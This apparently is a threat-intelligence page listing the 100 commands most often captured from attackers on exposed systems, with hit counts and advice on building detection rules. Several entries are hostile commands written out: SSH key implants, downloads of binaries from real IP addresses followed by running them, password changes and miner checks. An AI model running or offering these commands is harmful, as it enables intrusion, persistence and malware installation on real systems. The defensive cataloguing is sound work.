TROYANOSYVIRUS
Updated: April 2026

Top 100 Malicious Commands

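The commands attackers run most often after gaining access to a system. Useful for intrusion detection and incident response. Each entry gives the rank, the input as captured, and then the number of source IPs followed by the number of times it was seen (so "187 IPs307x" reads as 187 IPs, 307 executions). Some long entries are shown truncated, and a few (a password prompt, an HTTP header, a bare PING) are captured input rather than shell commands.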

5,828 commands in 24h
1.
$uname -a
187 IPs307x
2.
$cd ~; chattr -ia .ssh; lockr -ia .ssh
173 IPs268x
3.
$lockr -ia .ssh
173 IPs268x
4.
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
172 IPs267x
5.
$whoami
171 IPs265x
6.
$lscpu | grep Model
171 IPs265x
7.
$top
170 IPs264x
8.
$uname
170 IPs264x
9.
$cat /proc/cpuinfo | grep model | grep name | wc -l
170 IPs264x
10.
$cat /proc/cpuinfo | grep name | wc -l
170 IPs264x
11.
$which ls
170 IPs264x
12.
$ls -lh $(which ls)
170 IPs264x
13.
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
171 IPs264x
14.
$uname -m
170 IPs263x
15.
$w
170 IPs263x
16.
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
169 IPs263x
17.
$Enter new UNIX password:
108 IPs262x
18.
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
170 IPs261x
19.
$crontab -l
169 IPs261x
20.
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
101 IPs132x
21.
$/bin/./uname -s -v -n -r -m
21 IPs80x
22.
$/ip cloud print
6 IPs12x
23.
$rm -rf /data/local/tmp/*
3 IPs10x
24.
$echo hello
2 IPs9x
25.
$ifconfig
6 IPs6x
26.
$cat /proc/cpuinfo
6 IPs6x
27.
$ps -ef | grep '[Mm]iner'
6 IPs6x
28.
$chmod 0755 /data/local/tmp/nohup
3 IPs6x
29.
$ps | grep '[Mm]iner'
6 IPs6x
30.
$ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
6 IPs6x
31.
$locate D877F783D5D3EF8Cs
6 IPs6x
32.
$echo Hi | cat -n
6 IPs6x
33.
$pkill target; cd /data/local/tmp/; export PATH=$PATH:/data/local/tmp:/system/bin:/system/xbin; arch=$(uname -m); case $arch in *arm*) target=zyre.arm7;; *86|*64) target=zyre.x86;; *) target=zyre.arm7;; esac; if ! [ -f $target ]; then (wget http://103.130.214.71:1212/$target -O $target 2>/dev/null || curl -o $target http://103.130.214.71:1212/$target 2>/dev/null || busybox wget http://103.130.214.71:1212/$target -O $target 2>/dev/null || busybox curl -o $target http://103.130.214.71:1212/$target
1 IPs5x
34.
$uname -s -v -n -r -m
4 IPs5x
35.
$/data/local/tmp/nohup /data/local/tmp/trinity
2 IPs4x
36.
$ps | grep trinity
2 IPs4x
37.
$am start -n com.ufo.miner/com.example.test.MainActivity
2 IPs4x
38.
$chmod 0755 /data/local/tmp/trinity
2 IPs4x
39.
$/data/local/tmp/nohup su -c /data/local/tmp/trinity
2 IPs4x
40.
$pm path com.ufo.miner
2 IPs4x
41.
$cd /data/local/tmp;mkdir .p 2>/dev/null;cd .p;(wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null||busybox wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null||curl -so b http://196.251.107.133/bins/parm7 2>/dev/null||toybox wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null);chmod 777 b 2>/dev/null;(su 0 ./b adb||./b adb) 2>/dev/null;rm -f b;(wget -qO b http://196.251.107.133/bins/parm5 2>/dev/null||busybox wget -qO b http://196.251.107.133/bins/parm5 2>/dev/null||curl -so b ht
1 IPs4x
42.
$id -u && echo 'SEP' && uname -s && echo 'SEP' && nproc && echo 'SEP' && free -h | awk '/Mem:/ {print $2}'
1 IPs3x
43.
$pm install /data/local/tmp/ufo.apk
1 IPs2x
44.
$Accept-Encoding: gzip
1 IPs2x
45.
$ps | grep rig
1 IPs2x
46.
$uname -s -m
2 IPs2x
47.
$chmod 0755 /data/local/tmp/log
1 IPs2x
48.
$rm /data/local/tmp/tv.apk
1 IPs2x
49.
$chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtB
1 IPs2x
50.
$am start -n com.google.home.tv/com.example.test.MainActivity
1 IPs2x
51.
$ps | grep log
1 IPs2x
52.
$ps | grep xig
1 IPs2x
53.
$pm path com.google.home.tv
1 IPs2x
54.
$pm install /data/local/tmp/tv.apk
1 IPs2x
55.
$rm -f /data/local/tmp/ufo.apk
1 IPs2x
56.
$/data/local/tmp/nohup /data/local/tmp/log
1 IPs2x
57.
$PING
1 IPs2x
58.
$/data/local/tmp/nohup su -c /data/local/tmp/log
1 IPs2x
59.
$echo "P@ssw0rd\n3qaQNpDcCx98\n3qaQNpDcCx98\n"|passwd
1 IPs1x
60.
$echo "Frappe09!\n7lXZO1R0dwoR\n7lXZO1R0dwoR\n"|passwd
1 IPs1x
61.
$echo "123456\nU4YASKNFGWYw\nU4YASKNFGWYw\n"|passwd
1 IPs1x
62.
$echo "Dev25\nzomTc4OCC3Ov\nzomTc4OCC3Ov\n"|passwd
1 IPs1x
63.
$echo "Dev25\nPkyyIp6iRz3W\nPkyyIp6iRz3W\n"|passwd
1 IPs1x
64.
$echo "123456\nQSeRroFkH56R\nQSeRroFkH56R\n"|passwd
1 IPs1x
65.
$echo "Dev25\nBQX8B45JcwfW\nBQX8B45JcwfW\n"|passwd
1 IPs1x
66.
$echo "Dev2026\nO3gpkXDqcI2o\nO3gpkXDqcI2o\n"|passwd
1 IPs1x
67.
$echo "Dev2026\n9ZiIlCVpB3vm\n9ZiIlCVpB3vm\n"|passwd
1 IPs1x
68.
$echo "Bot21\nhEvsOvEuPLV9\nhEvsOvEuPLV9\n"|passwd
1 IPs1x
69.
$echo "12345678\nqbByemwtuNH5\nqbByemwtuNH5\n"|passwd
1 IPs1x
70.
$echo "12345678\nmKxpAPJ9BJmm\nmKxpAPJ9BJmm\n"|passwd
1 IPs1x
71.
$echo "Bot21\n902qDVuVqrnf\n902qDVuVqrnf\n"|passwd
1 IPs1x
72.
$echo "Bot2025!@#\nUdcnfH9owsFq\nUdcnfH9owsFq\n"|passwd
1 IPs1x
73.
$echo "Abc12345678!\nGBE7dRl8tdmw\nGBE7dRl8tdmw\n"|passwd
1 IPs1x
74.
$echo "AaAaAaAaAa12345\n4TLH3mGl6rDm\n4TLH3mGl6rDm\n"|passwd
1 IPs1x
75.
$echo "AaAaAaAaAa12345\n1kzfQODlqvch\n1kzfQODlqvch\n"|passwd
1 IPs1x
76.
$echo "frappe2\n2OPbSjceHj9n\n2OPbSjceHj9n\n"|passwd
1 IPs1x
77.
$echo "A123456a\nDyGMi7nbxgOM\nDyGMi7nbxgOM\n"|passwd
1 IPs1x
78.
$echo "fikifoouser\n3D57PQkEWzVd\n3D57PQkEWzVd\n"|passwd
1 IPs1x
79.
$echo "david\nbKboIjE4U0o0\nbKboIjE4U0o0\n"|passwd
1 IPs1x
80.
$echo "A123456a\n3a4j8isRWa5n\n3a4j8isRWa5n\n"|passwd
1 IPs1x
81.
$echo "22222222\nVlACPDSIwS5k\nVlACPDSIwS5k\n"|passwd
1 IPs1x
82.
$echo "12345678\n4EgdUCMU7UIm\n4EgdUCMU7UIm\n"|passwd
1 IPs1x
83.
$echo "0102025405\nLVJuKlsDOBKN\nLVJuKlsDOBKN\n"|passwd
1 IPs1x
84.
$echo "22222222\nEd79cIiEHKww\nEd79cIiEHKww\n"|passwd
1 IPs1x
85.
$echo "claude05\n3gJR2ee6TZF9\n3gJR2ee6TZF9\n"|passwd
1 IPs1x
86.
$echo "2024123\n0lsAtNOfCxAZ\n0lsAtNOfCxAZ\n"|passwd
1 IPs1x
87.
$echo "apollo\nkKriQJwky232\nkKriQJwky232\n"|passwd
1 IPs1x
88.
$echo "ali2025!@#\nl0861veO3oQI\nl0861veO3oQI\n"|passwd
1 IPs1x
89.
$echo "ali2025!@#\navyaKWcgx80X\navyaKWcgx80X\n"|passwd
1 IPs1x
90.
$echo "ali2025!@#\nQeMX9mB6hKxN\nQeMX9mB6hKxN\n"|passwd
1 IPs1x
91.
$echo "1qazEDC\nxiClgQKRqCxk\nxiClgQKRqCxk\n"|passwd
1 IPs1x
92.
$echo "david\nNtmnZoSUxZk5\nNtmnZoSUxZk5\n"|passwd
1 IPs1x
93.
$echo "david\nOB2gVHk85I6s\nOB2gVHk85I6s\n"|passwd
1 IPs1x
94.
$echo "david\nYpIsYpaeDHq3\nYpIsYpaeDHq3\n"|passwd
1 IPs1x
95.
$echo "123qweASD\nw0ok00QnpdJo\nw0ok00QnpdJo\n"|passwd
1 IPs1x
96.
$echo "edu\n2v6tsNw6pvJr\n2v6tsNw6pvJr\n"|passwd
1 IPs1x
97.
$echo "ali2025!@#\nL0Gyupjmyk2W\nL0Gyupjmyk2W\n"|passwd
1 IPs1x
98.
$echo "frappe07!\njH318kDLaDxx\njH318kDLaDxx\n"|passwd
1 IPs1x
99.
$echo "admin123\nNolctfRkIxJB\nNolctfRkIxJB\n"|passwd
1 IPs1x
100.
$echo "123qweASD\naH9Q5iHg7Ftm\naH9Q5iHg7Ftm\n"|passwd
1 IPs1x

Reconnaissance

uname, whoami, cat /etc/passwd

Download

wget, curl, tftp

Persistence

crontab, chmod, chattr

Lateral Movement

ssh, scp, ping

Detection Use

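These commands can be used to create detection rules in SIEM, IDS/IPS, and monitoring systems. Monitor these patterns in your logs to detect intrusions. Single commands such as uname, whoami, top or w are also part of routine administration and will alert on legitimate activity if matched alone. The stronger signals in this list are combinations and sequences: clearing the immutable attribute on .ssh and then rewriting authorized_keys, piping a new password into passwd, or fetching a file into /data/local/tmp and marking it executable. The addresses, key strings and file names shown come from this 24-hour sample, so treat them as short-lived indicators and keep rules focused on the behavior.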